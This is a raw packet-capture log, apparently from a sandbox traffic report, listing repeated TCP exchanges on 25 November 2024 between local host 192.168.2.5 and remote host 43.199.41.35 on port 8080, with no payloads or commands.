                                                                                                                                                        Nov 25, 2024 11:10:20.639719963 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.640431881 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.640444994 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.640482903 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.641309977 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.641459942 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.641500950 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.642247915 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.642390013 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.642431974 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.642973900 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.643115044 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.643151999 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.643877983 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.644032955 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.644071102 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.644787073 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.644941092 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.644984007 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.645570040 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.645839930 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.645883083 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.664833069 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.664849997 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.664863110 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.664875031 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.664920092 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.664972067 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.665133953 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.665385962 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.665426016 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.667906046 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.668195009 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.668241024 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.668847084 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.668997049 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.669035912 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.669297934 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.669310093 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.669353008 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.670173883 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.670190096 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.670238972 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.671086073 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.671235085 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.671281099 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.671919107 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.672091961 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.672135115 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.672841072 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.673001051 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.673041105 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.673818111 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.673835039 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.673877954 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.674635887 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.674653053 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.674698114 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.675432920 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.675610065 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.675659895 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.676383972 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.676544905 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.676588058 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.677136898 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.677299023 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.677350044 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.678177118 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.678191900 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.678253889 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.678945065 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.679100990 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.679146051 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.679868937 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.680010080 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.680051088 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.680910110 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.681062937 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.681103945 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.681663036 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.681921005 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.681972980 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.682686090 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.682703972 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.682759047 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.683459997 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.683613062 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.683655977 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.684350014 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.684506893 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.684551001 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.685300112 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.685466051 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.685525894 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.686008930 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.686095953 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.686173916 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.686223030 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.686407089 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.686909914 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.687220097 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.687268019 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.687994957 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.688148022 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.688191891 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.688905001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.688916922 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.688961983 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.689670086 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.689816952 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.689852953 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.690448999 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.690609932 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.690655947 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.691395044 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.691562891 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.691600084 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.692354918 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.692521095 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.692564011 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.693274975 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.693288088 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.693325043 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.694036007 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.694340944 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.694377899 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.694955111 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.695120096 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.695156097 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.695955038 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.696129084 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.696166992 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.696729898 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.747118950 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.798455954 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.798482895 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.798537016 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.798854113 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.798979998 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.799031973 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.799748898 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.799834967 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.799873114 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.800601959 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.800698996 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.800740004 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.801461935 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.801619053 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.801666975 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.802371979 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.802506924 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.802556038 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.803232908 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.803354025 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.803396940 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.828965902 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.829155922 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.829262018 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.829277039 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.829333067 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.829372883 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.830056906 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.830164909 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.830265999 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.830980062 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.831082106 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.831130981 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.831850052 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.831984997 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.832022905 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.832726955 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.832825899 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.832874060 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.833630085 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.833729982 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.833776951 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.834532976 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.834649086 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.834687948 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.835426092 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.835508108 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.835550070 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.836329937 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.836389065 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.836431980 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.856064081 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.856214046 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.856261015 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.856430054 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.856631994 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.856674910 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.857355118 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.857547045 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.857587099 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.858328104 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.858367920 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.858417988 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.859230042 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.859241962 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.859277010 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.860025883 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.860116959 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.860166073 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.860904932 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.861027002 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.861073017 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.861821890 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.861905098 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.861953974 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.862708092 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.862838030 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.862885952 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.863611937 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.863687992 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.863732100 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.864561081 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.864573002 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.864613056 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.865314960 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.865428925 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.865477085 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.866235018 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.866349936 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.866396904 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.867140055 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.867214918 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.867270947 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.868042946 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.868096113 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.868149996 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.868943930 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.869009972 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.869060040 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.869766951 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.869929075 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.869970083 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.870749950 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.870801926 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.870851040 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.871511936 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.871629000 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.871685982 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.872447014 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.872515917 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.872566938 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.873315096 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.873420954 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.873466969 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.874176025 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.874356031 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.874413967 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.875062943 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.875195026 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.875257015 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.875957012 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.876159906 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.876209021 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.876844883 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.877084017 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.877130985 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.877775908 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.877866983 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.877914906 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.878616095 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.878757954 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.878807068 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.879503012 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.879700899 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.879750013 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.880431890 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.880573988 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.880621910 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.881308079 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.881503105 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.881550074 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.882178068 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.882273912 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.882318020 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.883065939 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.883132935 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.883187056 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.883997917 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.884063005 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.884107113 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.884860992 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.884969950 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.885011911 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.885819912 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.885932922 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.885977030 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.886607885 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.886759996 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.886806965 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.887470961 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.932811022 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.990586042 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.990641117 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.990757942 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.990995884 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.991064072 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.991108894 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.991988897 CET80804970543.199.41.35192.168.2.5
